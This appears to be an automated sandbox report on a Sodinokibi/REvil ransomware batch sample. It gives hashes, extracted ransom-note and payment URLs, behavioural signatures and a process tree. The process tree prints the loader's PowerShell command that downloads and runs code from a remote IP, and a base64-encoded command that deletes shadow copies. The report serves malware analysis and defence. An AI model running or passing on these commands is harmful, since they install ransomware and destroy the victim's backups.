Analysis
-
max time kernel
51s -
max time network
55s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
10-08-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat
Resource
win10v200722
General
-
Target
3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat
-
Size
217B
-
MD5
2ab61d56f01d736001ccaac50b4175b3
-
SHA1
eb1e9c14e901a1dc760cf78c692a5ebc095b6bda
-
SHA256
db2c20d79fbbbaf8f83bee3506d0a2dfa7bcb5fd1e69be9abcf7c0016f0679ed
-
SHA512
81c624f718127b9f15c9f5fcc73b8e141263291061054393063974ba20c531574d9bbba856c2b63e0ac40a87067984b82dcd641eadffba3e6b804811bb9316cc
Malware Config
Extracted
http://185.103.242.78/pastes/3defad0fc0a8b4e37a73ffc6d2ea8f2c
Extracted
C:\9tn257c-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/861ABC9D5555F057
http://decryptor.cc/861ABC9D5555F057
Signatures
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 280 wrote to memory of 868 280 cmd.exe powershell.exe PID 280 wrote to memory of 868 280 cmd.exe powershell.exe PID 280 wrote to memory of 868 280 cmd.exe powershell.exe PID 280 wrote to memory of 868 280 cmd.exe powershell.exe PID 868 wrote to memory of 1848 868 powershell.exe powershell.exe PID 868 wrote to memory of 1848 868 powershell.exe powershell.exe PID 868 wrote to memory of 1848 868 powershell.exe powershell.exe PID 868 wrote to memory of 1848 868 powershell.exe powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 1848 powershell.exe Token: SeBackupPrivilege 1604 vssvc.exe Token: SeRestorePrivilege 1604 vssvc.exe Token: SeAuditPrivilege 1604 vssvc.exe Token: SeTakeOwnershipPrivilege 868 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8144168.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 868 powershell.exe 868 powershell.exe 868 powershell.exe 1848 powershell.exe 1848 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 868 powershell.exe -
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\FindRead.crw => \??\c:\users\admin\pictures\FindRead.crw.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\MoveUnprotect.png => \??\c:\users\admin\pictures\MoveUnprotect.png.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\RemoveComplete.raw => \??\c:\users\admin\pictures\RemoveComplete.raw.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\RequestUnprotect.tif => \??\c:\users\admin\pictures\RequestUnprotect.tif.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\RevokeFormat.tif => \??\c:\users\admin\pictures\RevokeFormat.tif.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\DenyEnable.png => \??\c:\users\admin\pictures\DenyEnable.png.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\EnterAdd.tif => \??\c:\users\admin\pictures\EnterAdd.tif.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\NewSkip.png => \??\c:\users\admin\pictures\NewSkip.png.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\RemoveUnregister.tiff => \??\c:\users\admin\pictures\RemoveUnregister.tiff.9tn257c powershell.exe File renamed C:\Users\Admin\Pictures\SyncSwitch.raw => \??\c:\users\admin\pictures\SyncSwitch.raw.9tn257c powershell.exe File opened for modification \??\c:\users\admin\pictures\RemoveUnregister.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ExitUnlock.png => \??\c:\users\admin\pictures\ExitUnlock.png.9tn257c powershell.exe -
Drops file in Program Files directory 22 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\PingOpen.DVR powershell.exe File opened for modification \??\c:\program files\RenameMount.ini powershell.exe File opened for modification \??\c:\program files\SwitchSkip.wm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\9tn257c-readme.txt powershell.exe File opened for modification \??\c:\program files\UndoGroup.xlsb powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\9tn257c-readme.txt powershell.exe File created \??\c:\program files (x86)\9tn257c-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectRead.svg powershell.exe File opened for modification \??\c:\program files\DenyUnprotect.jpeg powershell.exe File opened for modification \??\c:\program files\LimitUnlock.wma powershell.exe File opened for modification \??\c:\program files\RestartLimit.txt powershell.exe File opened for modification \??\c:\program files\TestResolve.3gp2 powershell.exe File opened for modification \??\c:\program files\BlockHide.rle powershell.exe File created \??\c:\program files\microsoft sql server compact edition\9tn257c-readme.txt powershell.exe File opened for modification \??\c:\program files\UnblockStep.wma powershell.exe File opened for modification \??\c:\program files\UnlockApprove.rar powershell.exe File created \??\c:\program files\9tn257c-readme.txt powershell.exe File opened for modification \??\c:\program files\AddMeasure.potx powershell.exe File opened for modification \??\c:\program files\CloseImport.htm powershell.exe File opened for modification \??\c:\program files\RenameClose.tiff powershell.exe File opened for modification \??\c:\program files\SendRepair.xml powershell.exe File opened for modification \??\c:\program files\UndoConvertTo.xltx powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:280 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3defad0fc0a8b4e37a73ffc6d2ea8f2c');Invoke-PJWVUIZXTL;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Modifies extensions of user files
- Drops file in Program Files directory
PID:868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1848
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1604